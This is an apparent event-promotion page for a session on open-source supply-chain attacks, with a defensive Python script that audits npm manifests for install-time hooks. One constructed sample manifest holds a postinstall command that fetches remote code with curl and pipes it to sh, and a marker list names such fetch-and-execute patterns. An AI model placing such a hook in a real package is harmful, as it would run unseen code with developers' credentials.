The open-source ecosystem is the lifeblood and starting point of every software supply chain. Packages are downloaded hundreds of thousands of times a day and used in all types of software around the globe. As threat actors increasingly execute more attacks via the open-source software ecosystem, clear gaps have emerged in modern application security.
While most organizations are focused on threats from critical vulnerabilities, attackers have moved on to new, more effective tactics that directly target developers. Even with tools like software composition analysis (SCA), security analytics, endpoint protection and private repositories in place, developers can still easily install open-source packages carrying malicious code that triggers on install to steal secrets or plant backdoors. Developers are responsible for innovation; they hold the AWS, SSH and GPG keys, often the signing keys, and have unfettered access to build infrastructure and source code version control systems. This makes them the new high-value targets, and the open-source ecosystem the new perimeter.
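The install-time hook is the mechanism the paragraph above refers to: a dependency's package.json can declare preinstall, install or postinstall scripts that the package manager runs automatically during `npm install`. The script below is an added example written for this page (it is not Phylum's code or product logic); it audits a set of manifests for such hooks and flags commands containing heuristic markers of remote-fetch-and-execute behaviour. The manifests, package names and the marker list are constructed for illustration.

```python
"""Audit npm package manifests for install-time lifecycle scripts.

Added example for this page, not code from Phylum or from the page author.
It models the risk the text describes: a dependency whose package.json
declares a preinstall / install / postinstall hook runs arbitrary code
the moment a developer runs `npm install`. All manifests below are
constructed sample data.
"""
import json
from typing import Dict, List

# npm lifecycle hooks that run automatically when a dependency is installed.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Substrings in a hook command that warrant a closer look.
# This list is a constructed heuristic, not an exhaustive signature set.
SUSPICIOUS_MARKERS = ("curl ", "wget ", "| sh", "| bash", "node -e", "eval(", "base64")

# Constructed sample package.json contents keyed by package name (illustrative only).
SAMPLE_MANIFESTS = {
    "left-pad-clone": json.dumps({"name": "left-pad-clone", "version": "1.0.0"}),
    "native-addon": json.dumps({
        "name": "native-addon", "version": "2.1.0",
        # Legitimate native builds also use install hooks, so a hook alone is not proof of malice.
        "scripts": {"install": "node-gyp rebuild"},
    }),
    "totally-fine-utils": json.dumps({
        "name": "totally-fine-utils", "version": "0.0.3",
        "scripts": {"postinstall":
                    "node -e \"require('child_process').exec('curl -s http://example.invalid/x | sh')\""},
    }),
}


def find_install_hooks(manifest_json: str) -> Dict[str, str]:
    """Return the lifecycle hooks in a manifest that execute during install."""
    data = json.loads(manifest_json)
    scripts = data.get("scripts") or {}  # "scripts" may be absent or null
    return {hook: cmd for hook, cmd in scripts.items() if hook in INSTALL_HOOKS}


def classify(cmd: str) -> str:
    """'suspicious' if the command carries a fetch/exec marker, else 'review'."""
    lowered = cmd.lower()
    return "suspicious" if any(m in lowered for m in SUSPICIOUS_MARKERS) else "review"


def audit(manifests: Dict[str, str]) -> List[dict]:
    """Audit every manifest and return one finding per install-time hook."""
    findings = []
    for name, manifest in manifests.items():
        for hook, cmd in find_install_hooks(manifest).items():
            findings.append({"package": name, "hook": hook,
                             "command": cmd, "severity": classify(cmd)})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_MANIFESTS):
        print(f"{f['severity']:10} {f['package']}: {f['hook']} -> {f['command']}")
```

Run against a real tree, `find_install_hooks` would be fed each `node_modules/*/package.json`; every hook it reports is code that runs with the developer's credentials and network access, so "review" findings deserve a human look even when no marker fires. The complementary control is to stop hooks from running at all, for example `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`), and to rebuild the few native packages that genuinely need a build step deliberately.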
DISCUSSION POINTS
Tom Field, SVP, Editorial, ISMG
Pete Morgan, Co-Founder and CSO, Phylum
Join Pete Morgan, Co-Founder and CSO at event sponsor Phylum, to gain his unique insight into the emerging gaps in modern application security and come away with key takeaways on how to put these findings to work to strengthen your own enterprise's defense.
This session will be held at:
The Grand Canal Shoppes, 3377 S Las Vegas Blvd, NV 89109
Phylum is a security-as-code platform that gives security and risk teams more visibility into the code development lifecycle, and the ability to enforce security policy without disrupting innovation. Phylum analyzes open-source software packages as they are published and contextualizes the risks, protecting developers and applications at the perimeter of the open-source ecosystem and the tools used to build source code. The platform can be deployed on endpoints or plug directly into CI/CD pipelines so organizations experience seamless, always-on defense at the earliest stages of a build.